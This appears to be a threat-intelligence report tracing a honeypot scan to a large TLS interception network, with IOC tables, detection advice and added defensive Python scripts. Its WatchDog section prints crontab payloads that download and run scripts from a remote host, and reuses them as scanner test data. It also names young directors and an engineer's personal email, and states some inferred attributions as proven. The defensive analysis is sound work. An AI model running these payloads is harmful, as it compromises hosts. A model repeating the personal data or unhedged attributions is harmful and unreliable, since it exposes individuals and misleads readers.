Severity: critical | Category: APT
Investigated: March 7, 2026 | Published: March 7, 2026

From Honeypot Hit to Russian State MITM: How a Single PostgreSQL Scan Led Us to a 128,000-IP Surveillance Empire

Threat Actors: NEKOBYTE, Bucklog, WatchDog group (suspected overlap/rivalry with TeamTNT)
Tags: #phishing #asyncrat #cobalt-strike #nekobyte #smokeloader #lumma #bucklog #c2 #ransomware #supply-chain

Published: 2026-03-08 | TLP:WHITE | Breakglass Intelligence

TL;DR

A routine 13-event PostgreSQL credential stuffing attempt against our honeypot from a NEKOBYTE INTERNATIONAL LIMITED IP (212.113.98.30) unraveled into one of the largest documented Man-in-the-Middle (MITM) interception operations in recent memory: 300+ proxy hosts serving 56 stolen TLS certificates for Apple, Google, GitHub, Microsoft, Amazon, WhatsApp, and dozens more, backed by 22 autonomous systems spanning 128,000+ IPv4 addresses, 13+ UK shell companies directed by teenage Russian/Belarusian/Ukrainian nominees, and definitive links to the Russian state surveillance apparatus (TSPU/SORM) via a Russian Government "Trusted Sub CA" certificate and VK-issued internal CA certificates with 30-year validity.


The Starting Point: 6 Hours, 4,564 Events, 99 IPs

On March 7, 2026, our DigitalOcean honeypot at 68.183.52.163 (NYC3) ingested 4,564 events from 99 unique source IPs over a 6-hour window. The automated triage pipeline scored the usual suspects: an env-harvesting Kubernetes cluster (Bucklog SARL, 3,171 requests), Bulgarian scanner infrastructure (4vendeta.com), a trio of Azure VMs hunting for pre-existing webshells, and assorted credential stuffers.

One IP scored a modest 25/100. It fired 13 PostgreSQL authentication attempts over 31 seconds, trying postgres with blank and "empty" passwords. Routine. Unremarkable. But its reverse DNS told a different story:

212.113.98.30 → vm36904.it-garage.network

The rDNS pointed to a hosting brand. The WHOIS pointed to NEKOBYTE INTERNATIONAL LIMITED, a UK company created December 16, 2025 -- barely 11 weeks old. The ASN, AS206134, began announcing prefixes on February 21, 2026 -- just two weeks before the scan hit our honeypot.

Brand-new ASN. Brand-new company. Russian infrastructure scanning PostgreSQL databases. We pulled the thread.


The MITM Infrastructure: Industrial-Scale Certificate Theft

Discovery Methodology

Standard port scanning (nmap, masscan) of NEKOBYTE's IP space returned almost nothing on port 443. The proxies employ SNI-based stealth activation: they only respond when the TLS Client Hello includes a Server Name Indication header matching a targeted domain. Without SNI, port 443 appears closed. This makes the infrastructure invisible to conventional scanning.

We probed with domain-specific SNI headers across NEKOBYTE's 23 announced prefixes. The results were staggering.

What We Found

Over 300 IP addresses across 20 of NEKOBYTE's 23 prefixes are running transparent TLS reverse proxies. Each proxy serves a valid, production TLS certificate for a major internet service -- not a self-signed forgery, but the genuine certificate with the genuine private key, verified against Certificate Transparency logs.

The proxies accept connections from victims whose traffic has been redirected (via DNS poisoning, BGP hijacking, or ISP-level TSPU/SORM equipment), present the real certificate, decrypt and inspect the traffic, then re-encrypt and forward it to the legitimate service. From the victim's perspective, everything looks normal. The padlock is green. The certificate is valid.

Confirmed Active Proxying

On 212.113.98.7:8443 and 212.113.98.12:8443, the Yandex MITM proxies return real Yandex response headers:

x-yandex-req-id: 1772899971184033-17249884045371771892-balancer-l7leveler-kubr-yp-sas-194-BAL

They set real Yandex cookies (_yasc, bh). The responses are HTTP 406, consistent with Yandex's actual server behavior for requests missing required parameters. This proves traffic transits through these proxies to real Yandex infrastructure while being intercepted in transit.

On the GitHub MITM nodes (212.113.98.100, 147.45.210.100), the proxies serve the complete GitHub login page with working CSRF tokens (authenticity_token), real session cookies (_gh_sess, _octo, logged_in), and functional git-upload-pack protocol (confirmed by fetching torvalds/linux refs). The GitHub DV certificate -- serial 1DC289C1EADAFB04E9D1CF53D5D72253 -- was issued by Sectigo on March 6, 2026, one day before our scan. The operation is actively acquiring new certificates.


Certificate Inventory: 56 Stolen Certificates Across the Global Internet

Extended Validation (EV) Certificates -- Highest Severity

EV certificates require extensive legal entity verification, including corporate document validation. These cannot be obtained through simple domain control verification.

| Target | Certificate Serial | Issuer | Hosts |
|---|---|---|---|
| www.icloud.com | 77B7A9C8C7061FD5534F327C4A267713 | Apple Public EV Server RSA CA 1 - G1 | 3+ |
| www.apple.com | 0A22ACE42FC71F463F953EF0B5A83F0C | Apple Public EV Server RSA CA 1 - G1 | 3+ |
| images.apple.com | 51B33882D6DA285928E81E8AB9C7AAAA | Apple Public EV Server ECC CA 1 - G1 | 1+ |
| itunes.apple.com | 02C1C6D6D8EA849BAC63B8F3BD164E91 | Apple Public EV Server RSA CA 1 - G1 | 1+ |
| store.steampowered.com | 602290773 (Valve Corp) | DigiCert Global G3 TLS ECC SHA384 | 1+ |

Organization-Validated (OV) and Domain-Validated (DV) Certificates

| Target | Issuer | MITM Hosts | Category |
|---|---|---|---|
| *.google-analytics.com | Google Trust Services WR2 | 230+ | Mass interception |
| *.google.com | Google Trust Services WR2 | 100+ | Search/services |
| github.com | Sectigo DV E36 | 26+ | Developer platform |
| www.microsoft.com | Microsoft TLS G2 RSA CA OCSP 04 | 4+ | Enterprise |
| www.amazon.com | Amazon RSA 2048 M04 | 4+ | E-commerce |
| *.yandex.tr (+49 domains) | GlobalSign ECC OV 2018 | 12+ | Russian search |
| *.vk.com (+28 domains) | GlobalSign ECC OV 2018 | 10+ | Russian social media |
| *.tesla.com | GeoTrust TLS RSA CA G1 | 3+ | Automotive |
| *.intel.com | Sectigo Public Server Auth CA OV E36 | 1+ | Semiconductors |
| *.reddit.com | DigiCert Global G2 TLS RSA SHA256 | 1+ | Social media |
| *.wikipedia.org | Let's Encrypt E8 | 2+ | Knowledge |
| www.zdf.de | DigiCert Global G2 TLS RSA SHA256 | 1+ | German national TV |
| *.telegram.org | GoDaddy | 1+ | Messaging |
| cloudflare-dns.com | SSL.com ECC R2 | 1+ | DNS security |

The Google Analytics certificate is the most widespread, deployed across 230+ hosts. Because Google Analytics tracking beacons are loaded by millions of websites, intercepting *.google-analytics.com provides passive traffic collection from every GA-enabled site visited by a target. This is mass surveillance infrastructure.

Certificate Verification Against CT Logs

The github.com certificate served on NEKOBYTE proxies was verified against Certificate Transparency logs at crt.sh (IDs 24809178038, 24809177625). The serial number and SHA1 fingerprint are identical to the certificate served by the real github.com. These are not forged certificates -- they are the genuine certificates with genuine private keys. This is only possible through state-level access to certificate private keys, compromise of organizational PKI infrastructure, or compromise of Certificate Authorities.


The Russian State Smoking Gun: TBank and VK Internal CA

Russian Government "Trusted Sub CA" Certificate

One host serves a TLS certificate for *.t-bank-app.ru issued by the "Russian Trusted Sub CA" -- a certificate authority operated by the Russian government under the TSPU (Technical Means for Countering Threats) program. This is not a public CA that issues certificates to anyone who requests them. This is a state-operated CA, and its presence on this infrastructure definitively links the operation to the Russian state.

VK Internal CA -- 30-Year Purpose-Built Surveillance Certificate

Multiple hosts (138.124.241.37, .45, .76, 144.31.251.21, 138.124.231.2:8443) serve VK certificates issued not by a public CA, but by VK's own private intermediate CA:

issuer:   C=RU, L=Saint Petersburg, O=VK, CN=VK interm CA
validity: Jul 13, 2022 -- Aug 24, 2052 (30-YEAR CERT)
serial:   724791A0BB85EA47683BF75D06F47791E0571781

This is not a stolen public certificate. A 30-year validity period is incompatible with any public CA policy. This is a purpose-built internal certificate for TLS interception, proving VK cooperates with the surveillance operation, almost certainly under SORM (System for Operative Investigative Activities) legal requirements that compel Russian service providers to enable lawful interception capabilities.

WhatsApp Interception Proxy

At 144.31.98.33, an unauthenticated HAProxy stats page (port 9200) reveals a TCP-level WhatsApp interception proxy:

| Component | Backend Target | Connections | Data Volume |
|---|---|---|---|
| haproxy_v4_whatsapp_net | whatsapp.net:443 | 62,254 | 12.3 MB in / 686.3 MB out |
| wa (XMPP) | g.whatsapp.net:5222 | 7,466 | 10.4 MB in / 92.7 MB out |

The proxy has been running for approximately 15.5 days (since ~February 20, 2026) and has handled 62,254 TLS connections and 7,466 XMPP connections to WhatsApp servers, moving 686 MB of outbound data.


Network Topology: 22 ASNs, 128,000 IPs, One Operator

The Corporate Shell Game

Tracing RIPE database objects, DNS records, UK Companies House filings, and billing portal hostnames, we mapped a three-tier network:

TIER 0 -- UPSTREAM TRANSIT
  aurologic GmbH (AS30823, Frankfurt) -- DDOS-GUARD -- Hurricane Electric
       |
TIER 1 -- CORE BACKBONE
  AS49418  NETSHIELD LTD -- transit hub, 7 IXPs
  AS198981 NETSHIELD-BYOIP -- secondary
       |
TIER 2 -- OPERATIONAL ENTITIES (all transit via AS49418)
  +-- AS206134  NEKOBYTE INTERNATIONAL -- MITM proxy infrastructure
  +-- AS213887  WAIcore Ltd -- largest IP holder (16,896 IPv4)
  +-- AS216127  NUXTCLOUD / Int'l Hosting Co -- 15,360 IPv4
  +-- AS215590  DpkgSoft/XORA -- 21,796 IPv4
  +-- AS212701  Hostinux -- hosting brand
  +-- AS200823  MHost LLC -- Georgian front
  +-- AS210546  CHSL ONE -- hosting brand
  +-- [7 more ASNs]

Proof of Unified Control

Six nominally separate domains -- it-garage.pro, waicore.com, mhost.ee, netshield.ltd, altawk.com, hostinux.com -- all converge on a single NETSHIELD IP: 64.188.114.188 (hostname: web.netshield.uk). The MHost billing portal (my.mhost.ee) resolves to breaking-bad-bm.waicore.network. A single RIPE IP block (62.60.252.0/24) has five different maintainers from five "separate" entities. The same RIPE admin handle (AA44942-RIPE) appears on NEKOBYTE, NUXTCLOUD, and IT-GARAGE objects.

The Teenage Director Pattern

All 13+ UK shell companies use three London virtual office addresses (71-75 Shelton Street, 128 City Road, 27 Old Gloucester Street) and are directed by Russian, Belarusian, and Ukrainian nationals aged 18-22 at appointment:

| Company | Director | DOB | Nationality | Age at Appointment |
|---|---|---|---|---|
| NEKOBYTE INTERNATIONAL | Sergei Satsukevich | Apr 2005 | Russian | 20 |
| NETSHIELD LTD | Aleksei Diabin | Jan 2005 | Russian | 19 |
| WAIcore Ltd | Aliaksei Bolbas | Feb 2004 | Belarusian | 20 |
| PARTNER HOSTING | Denys Hnoievyi | Aug 2005 | Ukrainian | 18 |
| DPKGSOFT INTERNATIONAL | Aleksei Diabin | Jan 2005 | Russian | 19 |

NETSHIELD has cycled through three directors in three years, each younger than the last. Companies are incorporated, used for RIPE allocations, dissolved, and replaced with successors -- NEKOBYTE LIMITED (created June 2025, dissolved January 2026) was replaced by NEKOBYTE INTERNATIONAL LIMITED (created December 2025) with a one-month overlap.

The actual network engineering is performed by Dan Fedoseev (dan.fedoseev.20@gmail.com), who controls DGTLS-MNT and MNT-DGTL (250+ RIPE objects combined) but never appears as a director of any UK company. He stays behind the RIPE infrastructure layer while nominee directors absorb legal liability.


Threat Intelligence Crosslinks

Doppelganger Disinformation Campaign

Documented by Intrinsec (April 2025) and Qurium Media Foundation (July 2024), Partner Hosting LTD and WAIcore IPs hosted front domains in the Russian state-linked Doppelganger disinformation campaign targeting Western democracies. aurologic GmbH provided upstream transit. When Qurium reported NETSHIELD's AS198981 to aurologic CEO Joseph Maximilian Hofmann, he blocked the researchers on X rather than acting.

Redline Stealer C2

Acronis documented a Redline Stealer C2 server (82.115.223.190) registered under "Flameochka Servers" with the registrar email lir@wai.ac -- a WAIcore domain.

Marshall Servers -- Bulletproof Hosting on Russian Cybercrime Forums

User "Flameochka" operates Marshall Servers on the WAIcore/NETSHIELD network, advertised on lolz.live and FB-Killa (major Russian cybercrime forums). The same infrastructure hosts Altawk Hosting (altawk.com), another bulletproof hosting brand accepting cryptocurrency payments.

Recorded Future Assessment

Recorded Future classifies WAIcore, Netshield, DpkgSoft, and Partner Hosting as "Threat Activity Enablers." The upstream provider aurologic GmbH was the subject of Recorded Future's report "Malicious Infrastructure Finds Stability with aurologic GmbH" and is ranked in the top-10 for malicious activity density.


Collateral Findings: Fraud and Malware Co-Hosted

The MITM surveillance infrastructure shares hosting with active fraud operations:

  • Van Gogh Museum ticket scam (vangoghmuseum.sale, MHOST AS200823): HTTrack clone of the real museum site, actively buying Google Ads (AW-17048113350) to drive victim traffic. SSL issued March 3, 2026.
  • Clonedshop.net crypto scam: Full checkout flow accepting 6 cryptocurrencies with Telegram-based exfiltration (bot token 8473425222:AAG..., chat 7375062113).
  • Fake ByBit exchange (95.85.236.27:8080, MHOST): Cyrillic character substitution ("ByBit" rendered as "ВуВit"), Java/Spring Boot backend with admin panel and live chat.
  • Miller Drainer (147.45.218.10, HOSTINUX): Drainer-as-a-Service panel targeting ETH, BSC, Polygon, and Arbitrum chains.
  • alantra-markets.com (77.239.127.64, NEKOBYTE): Russian-language fake trading platform directly on NEKOBYTE MITM infrastructure.
  • ScreenConnect RAT delivery via indictmentportal.online (77.91.70.57, CHSL-ONE).

WatchDog Cryptojacking on NEKOBYTE

At 212.113.98.33, an unauthenticated Redis 8.4.0 instance contains four crontab injection payloads for the WatchDog cryptojacking group (active since January 2019):

*/2 * * * * root cd1 http://b.clu-e.eu/b2f628/b.sh
*/3 * * * * root wget -q -O- http://b.clu-e.eu/b2f628/b.sh
*/4 * * * * root curl http://b.clu-e.eu/b2f628/b.sh
@hourly python -c "import urllib2; print urllib2.urlopen('http://b.clu-e.eu/t.sh').read()" >.1;chmod +x .1;./.1

The /b2f628/ directory is a confirmed WatchDog attribution marker (Unit42, Cado Security, Securonix). The NEKOBYTE server is a victim, not the operator -- its exposed Redis was compromised by the worm, having received 286,365 connections in 16 days.
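To turn the Redis finding above into a check you can run against your own instances, here is an added example (not the report's tooling) that walks a key dump collected with SCAN + GET and flags values carrying the crontab-injection pattern: a cron schedule followed by a command that fetches a remote URL, or the /b2f628/ WatchDog marker. The sample dump is constructed; it contains the four payload lines quoted above (keys named backup1..backup4 are my own choice) plus two benign keys for contrast.

```python
"""Detect crontab-injection payloads stored in Redis keys (WatchDog pattern).

Added example, not from the report.  The attack writes crontab-shaped
values into Redis and then dumps the database into a cron directory, so the
values themselves are the indicator: a cron schedule plus a remote download.
"""
import re

# Five numeric/wildcard schedule fields, or a cron nickname such as @hourly.
CRON_SCHEDULE = re.compile(
    r"^\s*(?:@(?:reboot|hourly|daily|weekly|monthly|yearly|annually)\b"
    r"|(?:[\d*/,-]+\s+){5})"
)
URL = re.compile(r"https?://\S+")
WATCHDOG_MARKER = "/b2f628/"   # attribution marker named in the report


def classify(value):
    """Return the (sorted, de-duplicated) reasons a Redis value is suspicious."""
    reasons = set()
    for line in value.splitlines():
        if CRON_SCHEDULE.match(line) and URL.search(line):
            reasons.add("cron entry fetching a remote URL")
        if WATCHDOG_MARKER in line:
            reasons.add("WatchDog /b2f628/ marker")
    return sorted(reasons)


def scan_dump(dump):
    """dump: {key: value} as collected with SCAN + GET.  Returns {key: reasons}
    for every key that triggered at least one rule."""
    return {key: reasons for key, value in dump.items() if (reasons := classify(value))}


# Constructed key dump.  The four payload lines are the ones quoted in the
# report; the leading newlines are how the injection keeps the RDB header
# from breaking the cron parser.  Key names and the benign keys are made up.
SAMPLE_DUMP = {
    "session:4f2a": '{"user": "alice", "role": "viewer"}',
    "backup1": "\n\n*/2 * * * * root cd1 http://b.clu-e.eu/b2f628/b.sh\n\n",
    "backup2": "\n\n*/3 * * * * root wget -q -O- http://b.clu-e.eu/b2f628/b.sh\n\n",
    "backup3": "\n\n*/4 * * * * root curl http://b.clu-e.eu/b2f628/b.sh\n\n",
    "backup4": "\n\n@hourly python -c \"import urllib2; print urllib2.urlopen("
               "'http://b.clu-e.eu/t.sh').read()\" >.1;chmod +x .1;./.1\n\n",
    "nightly": "0 2 * * * root /usr/local/bin/rotate-logs",   # benign cron-looking value
}

if __name__ == "__main__":
    for key, reasons in scan_dump(SAMPLE_DUMP).items():
        print(f"{key}: {', '.join(reasons)}")
```

The `nightly` key shows why the schedule alone is not enough: a legitimate cron-shaped string is only flagged when the command also pulls something over HTTP, while the marker rule catches payloads whose downloader is garbled (as in `backup1`, where the command is not a recognisable tool).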


The Upstream Enabler: aurologic GmbH (AS30823)

All NEKOBYTE/NETSHIELD traffic transits through aurologic GmbH in Frankfurt, operated by CEO Joseph Maximilian Hofmann from Robert-Bosch-Str. 25, 63225 Langen, Germany.

aurologic is not a negligent transit provider. It was created by renaming combahton GmbH (itself a known abuse-friendly provider). It continues to provide transit for OFAC-sanctioned Aeza International (AS210644 -- BianLian ransomware, Lumma, RedLine, FSB-arrested co-founders). Its 37 downstream ASNs host 30+ malware families including BianLian, Lumma, Meduza, RedLine, Rhadamanthys, AsyncRAT, REMCOS, Cobalt Strike, Sliver, SmokeLoader, and DDoSia.

When confronted by German journalists (CORRECTIV), CEO Hofmann stated: "I can kick everyone out, but then at some point I won't make any sales."


MITRE ATT&CK Mapping

| Technique | ID | Application |
|---|---|---|
| Adversary-in-the-Middle | T1557 | TLS interception with stolen/compelled certificates |
| Network Sniffing | T1040 | Passive traffic capture through MITM proxies |
| Steal Web Session Cookie | T1539 | VK/Yandex/Google cookie interception (confirmed live) |
| Data from Cloud Storage | T1530 | iCloud data interception via Apple EV cert |
| Email Collection | T1114 | mail.ru MITM proxy |
| Credentials from Password Stores | T1555 | Browser credential interception via transparent proxy |
| Supply Chain Compromise | T1195 | Compromise of certificate infrastructure / compelled key disclosure |
| Proxy | T1090 | Transparent TLS reverse proxy infrastructure |
| Domain Fronting | T1090.004 | SNI-based stealth activation (invisible to standard scanning) |
| Acquire Infrastructure | T1583.003 | Bulletproof VPS via shell company network |
| Digital Certificates | T1587.003 | Fraudulent/compelled TLS certificates |
| Scheduled Task/Job: Cron | T1053.003 | WatchDog Redis crontab injection (collateral finding) |

Defensive Recommendations

Immediate Actions

  1. Certificate Transparency monitoring. Set up CT log alerts for any certificate issuance to your organization's domains. The NEKOBYTE operation is actively acquiring new certificates -- the Intel cert was issued March 4, 2026 (3 days before detection), and the GitHub cert was issued March 6 (1 day before).

  2. Block AS206134 (NEKOBYTE) and AS49418 (NETSHIELD) at your perimeter. Block the full list of prefixes in the IOC tables below. If your firewall supports ASN-based blocking, block all 22 related ASNs.

  3. Certificate pinning. For critical internal services that access Apple, Google, Microsoft, or GitHub APIs, implement certificate pinning or at minimum monitor for unexpected certificate changes.

  4. HAProxy stats exposure. The WhatsApp MITM proxy at 144.31.98.33:9200 has unauthenticated HAProxy stats. If you operate HAProxy, ensure your stats pages require authentication and are not exposed to the internet.
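Item 1 above (Certificate Transparency monitoring) in working form, as an added example rather than anything from the report: it pulls the crt.sh JSON feed for a domain and reports certificates whose not_before is on or after a chosen date and whose serial is not already in your inventory. The crt.sh endpoint and its JSON field names are real; SAMPLE_ENTRIES is constructed around the GitHub certificate the report cites (serial 1DC289C1EADAFB04E9D1CF53D5D72253 and crt.sh IDs 24809178038 / 24809177625 are from the report, the issuer string is abbreviated and the older entry is invented).

```python
"""Certificate Transparency watch: alert on issuances newer than a baseline.

Added example, not the report's tooling.  crt.sh returns one row per log
entry, so a single certificate usually appears twice (precertificate and
leaf) with the same serial; alerts are de-duplicated on the serial.
"""
import json
import urllib.parse
import urllib.request
from datetime import datetime

CRTSH_JSON = "https://crt.sh/?q={query}&output=json"   # real crt.sh JSON endpoint


def fetch_crtsh(domain, timeout=30):
    """Live fetch (not called at import): every CT entry for domain and its subdomains."""
    url = CRTSH_JSON.format(query=urllib.parse.quote(f"%.{domain}"))
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return json.loads(resp.read().decode("utf-8"))


def _ts(value):
    """crt.sh timestamps are ISO-8601 without a zone, e.g. '2026-03-06T00:00:00';
    a bare date such as '2026-03-01' is accepted for the cutoff."""
    return datetime.fromisoformat(value)


def new_issuances(entries, known_serials, since):
    """Return one alert per certificate whose not_before is on or after `since`
    and whose serial is not in `known_serials`.  Serials are compared as
    integers so leading-zero and case differences between sources do not matter."""
    known = {int(s, 16) for s in known_serials}
    cutoff = _ts(since)
    seen, alerts = set(), []
    for e in sorted(entries, key=lambda e: e["not_before"]):
        serial = int(e["serial_number"], 16)
        if serial in known or serial in seen or _ts(e["not_before"]) < cutoff:
            continue
        seen.add(serial)
        alerts.append({
            "serial": f"{serial:X}",
            "issuer": e["issuer_name"],
            "names": sorted(set(e["name_value"].split("\n"))),
            "not_before": e["not_before"],
            "crtsh_id": e["id"],
        })
    return alerts


# Constructed sample shaped like crt.sh output.  Entry 1 is invented; entries
# 2 and 3 carry the GitHub serial and crt.sh IDs quoted in the report, with
# an abbreviated issuer string and an assumed not_after.
SAMPLE_ENTRIES = [
    {"id": 1, "issuer_name": "CN=Example Old CA (constructed)",
     "common_name": "github.com", "name_value": "github.com",
     "not_before": "2025-09-01T00:00:00", "not_after": "2025-12-01T00:00:00",
     "serial_number": "0a0b0c0d0e0f"},
    {"id": 24809177625, "issuer_name": "CN=Sectigo DV E36 (abbreviated)",
     "common_name": "github.com", "name_value": "github.com\nwww.github.com",
     "not_before": "2026-03-06T00:00:00", "not_after": "2026-06-04T00:00:00",
     "serial_number": "1dc289c1eadafb04e9d1cf53d5d72253"},
    {"id": 24809178038, "issuer_name": "CN=Sectigo DV E36 (abbreviated)",
     "common_name": "github.com", "name_value": "github.com\nwww.github.com",
     "not_before": "2026-03-06T00:00:00", "not_after": "2026-06-04T00:00:00",
     "serial_number": "1dc289c1eadafb04e9d1cf53d5d72253"},
]

if __name__ == "__main__":
    inventory = ["0a0b0c0d0e0f"]          # serials you already know you own
    for alert in new_issuances(SAMPLE_ENTRIES, inventory, since="2026-03-01"):
        print("NEW CERT:", alert)
    # Against the live feed: new_issuances(fetch_crtsh("example.com"), inventory, "2026-03-01")
```

Run it on a schedule with `since` set to the last run and `known_serials` fed from your own certificate inventory; anything it prints is a certificate for your names that you did not issue or did not record, which is exactly the condition the Intel and GitHub issuances in this report would have triggered.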

Detection Rules

  1. SNI mismatch detection. Monitor for TLS connections where the SNI hostname resolves to a NEKOBYTE IP range rather than the legitimate service's IP. This is the primary indicator that traffic is being redirected through the MITM infrastructure.

  2. Certificate serial monitoring. Compare TLS certificate serials observed in your network against the IOC list below. If you see any of these serials served from an IP outside the legitimate service's infrastructure, you have a MITM condition.

  3. Google Analytics interception detection. Monitor DNS responses for *.google-analytics.com resolving to non-Google IP ranges. With 230+ MITM hosts, this is the most widespread interception vector.
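The three detection rules above as a small checker, added here as an example and not part of the report's own tooling. The prefixes and serials are copied from the IOC tables in this report; `expected_prefixes` is an assumed parameter for the legitimate service's address ranges (rule 3); and `der_serial` walks the leaf certificate's DER with the standard library only, so the serial can be compared against the IOC list without a third-party X.509 parser. `probe()` performs the live TLS handshake with the SNI you care about against the address your resolver returned and is not called at import.

```python
"""Apply the report's detection rules to an observed TLS connection.

Added example.  Rule 1: the SNI hostname resolved into a MITM-confirmed
prefix.  Rule 2: the leaf serial is one of the IOC serials.  Rule 3: the
hostname resolved outside the ranges you expect for that service.
"""
import hashlib
import ipaddress
import socket
import ssl

# Subset of the "Network Prefixes -- MITM Confirmed" table in this report.
MITM_PREFIXES = [ipaddress.ip_network(p) for p in (
    "212.113.98.0/24", "212.113.99.0/24", "144.31.98.0/24", "144.31.251.0/24",
    "138.124.240.0/24", "138.124.241.0/24", "147.45.210.0/24", "77.239.127.0/24",
)]

# Subset of the "Certificate Serials" table in this report (upper-case hex).
IOC_SERIALS = {
    "github.com": "1DC289C1EADAFB04E9D1CF53D5D72253",
    "*.google-analytics.com": "5E5763F5526E8B620ACB826C673569E6",
    "www.icloud.com": "77B7A9C8C7061FD5534F327C4A267713",
    "*.intel.com": "76835B6F9FD062D65AAEB8DC9CB8F000",
}


def _tlv(buf, pos):
    """Read one DER tag and length at pos; return (tag, value_start, value_end)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                       # long form: low bits give the byte count
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, pos, pos + length


def der_serial(der):
    """serialNumber of a DER certificate, as upper-case hex without DER sign padding.
    Certificate ::= SEQUENCE { tbsCertificate SEQUENCE { [0] version OPTIONAL,
    serialNumber INTEGER, ... }, ... }"""
    _, pos, _ = _tlv(der, 0)                # Certificate
    _, pos, _ = _tlv(der, pos)              # tbsCertificate
    tag, start, end = _tlv(der, pos)
    if tag == 0xA0:                         # explicit [0] version present: skip it
        tag, start, end = _tlv(der, end)
    if tag != 0x02:
        raise ValueError("serialNumber INTEGER not found")
    return der[start:end].lstrip(b"\x00").hex().upper()


def ip_in_mitm_prefixes(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in MITM_PREFIXES)


def matches_ioc_serial(serial):
    """IOC target whose serial equals `serial` (compared as integers), else None."""
    value = int(serial, 16)
    for target, ioc in IOC_SERIALS.items():
        if int(ioc, 16) == value:
            return target
    return None


def assess(sni, ip, serial, expected_prefixes=()):
    """Return the list of findings for one observed connection (empty if clean)."""
    findings = []
    if ip_in_mitm_prefixes(ip):
        findings.append(f"{sni} resolved to {ip}, inside a MITM-confirmed prefix")
    if expected_prefixes and not any(
            ipaddress.ip_address(ip) in ipaddress.ip_network(p) for p in expected_prefixes):
        findings.append(f"{sni} resolved to {ip}, outside its expected ranges")
    target = matches_ioc_serial(serial)
    if target:
        findings.append(f"serial {serial.upper()} is the IOC serial for {target}")
    return findings


def probe(sni, ip, port=443, timeout=5.0):
    """Live check (not run at import): handshake to ip with SNI=sni and return the
    leaf's (serial, SHA-1 fingerprint).  Chain verification is switched off so the
    certificate is captured whatever it chains to; a genuine stolen certificate
    would verify cleanly anyway, which is the whole problem."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    with socket.create_connection((ip, port), timeout=timeout) as sock:
        with ctx.wrap_socket(sock, server_hostname=sni) as tls:
            der = tls.getpeercert(binary_form=True)
    return der_serial(der), hashlib.sha1(der).hexdigest().upper()


if __name__ == "__main__":
    # Constructed observation: the report's GitHub serial seen from a NEKOBYTE address.
    for line in assess("github.com", "147.45.210.100", "1DC289C1EADAFB04E9D1CF53D5D72253"):
        print("ALERT:", line)
```

Feed `assess()` from whatever already records SNI, destination IP and certificate serial (Zeek's ssl and x509 logs, or a TLS-inspecting firewall); the SHA-1 from `probe()` is what you compare against the fingerprint crt.sh shows for the same serial, which is the CT check the report describes.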

Organizational Actions

  1. Report to affected CAs. DigiCert (Apple, AMD, Oracle, Yahoo, Reddit, Pinterest), GlobalSign (Yandex, VK, Ozon, Avito), Sectigo (GitHub, Intel), Google Trust Services (Google Analytics, Google.com), and Microsoft should receive certificate revocation requests with the serials and NEKOBYTE IPs as evidence.

  2. RIPE NCC abuse report for AS206134, AS49418, and associated ASNs. Request review of all ACE Data Centers sub-allocations.

  3. UK NCA referral. All shell companies are UK-registered. The pattern of teenage nominee directors, systematic company rotation, and virtual office addresses warrants investigation.


Indicators of Compromise

Network Prefixes -- MITM Confirmed

| Prefix | ASN | Entity |
|---|---|---|
| 212.113.98.0/24 | AS206134 | NEKOBYTE |
| 212.113.99.0/24 | AS206134 | NEKOBYTE |
| 144.31.98.0/24 | AS206134 | NEKOBYTE |
| 144.31.181.0/24 | AS206134 | NEKOBYTE |
| 144.31.182.0/24 | AS206134 | NEKOBYTE |
| 144.31.188.0/24 | AS206134 | NEKOBYTE |
| 144.31.251.0/24 | AS206134 | NEKOBYTE |
| 144.31.132.0/24 | AS210546 | CHSL-ONE |
| 138.124.240.0/24 | AS206134 | NEKOBYTE |
| 138.124.241.0/24 | AS206134 | NEKOBYTE |
| 147.45.210.0/24 | AS206134 | NEKOBYTE |
| 178.236.240.0/24 | AS206134 | NEKOBYTE |
| 178.236.243.0/24 | AS206134 | NEKOBYTE |
| 195.62.48.0/23 | AS206134 | NEKOBYTE |
| 64.188.115.0/24 | AS206134 | NEKOBYTE |
| 77.91.70.0/24 | AS210546 | CHSL-ONE |
| 77.91.79.0/24 | AS206134 | NEKOBYTE |
| 77.239.125.0/24 | AS206134 | NEKOBYTE |
| 77.239.126.0/24 | AS206134 | NEKOBYTE |
| 77.239.127.0/24 | AS206134 | NEKOBYTE |
| 45.131.214.0/24 | AS200823 | MHOST |
| 95.85.236.0/24 | AS200823 | MHOST |
| 138.124.231.0/24 | AS212701 | HOSTINUX |
| 147.45.218.0/24 | AS212701 | HOSTINUX |

Key Infrastructure IPs

| IP | Role |
|---|---|
| 144.31.98.33 | WhatsApp MITM proxy (HAProxy stats on :9200) |
| 212.113.98.7 | Active Yandex MITM proxy (:8443) |
| 212.113.98.12 | Active Yandex MITM proxy (:8443) |
| 212.113.98.25 | Active VK.com MITM proxy |
| 212.113.98.100 | GitHub MITM proxy (DynDNS: saintjueves.strangled.net) |
| 147.45.210.100 | GitHub MITM proxy (rDNS: vm23588.it-garage.network) |
| 212.113.98.139 | Apple iCloud MITM proxy |
| 212.113.98.33 | Compromised Redis (WatchDog victim) |
| 64.188.114.188 | NETSHIELD web infrastructure (6 domains converge here) |

Certificate Serials (for CT log monitoring and revocation)

| Target | Serial |
|---|---|
| github.com | 1DC289C1EADAFB04E9D1CF53D5D72253 |
| *.google-analytics.com | 5E5763F5526E8B620ACB826C673569E6 |
| *.google.com | CC025CEB2451A2AD0ABB644A397D1106 |
| www.icloud.com | 77B7A9C8C7061FD5534F327C4A267713 |
| www.apple.com | 0A22ACE42FC71F463F953EF0B5A83F0C |
| images.apple.com | 51B33882D6DA285928E81E8AB9C7AAAA |
| itunes.apple.com | 02C1C6D6D8EA849BAC63B8F3BD164E91 |
| www.microsoft.com | 43000253929E1C999055F04653000000025392 |
| *.yandex.tr | 7F55445E56EBD6821B0F565F |
| *.intel.com | 76835B6F9FD062D65AAEB8DC9CB8F000 |
| *.tesla.com | 0F2E92ADC36EC53625D660EC774BEC67 |
| *.www.yahoo.com | 03F523F3F8ECE84CC3B6C916173D4CFE |
| cloudflare-dns.com | 4ED03304C46B87A8C2EB5569DB9EBA0C |
| *.t-bank-app.ru | 019648D22826DAB4347F1C36097F |
| www.zdf.de | 024F850BB0C90D719A3EE12C01F4C6AB |
| *.wikipedia.org | 0666163CC3790D2D917D56A0DD1C87974320 |
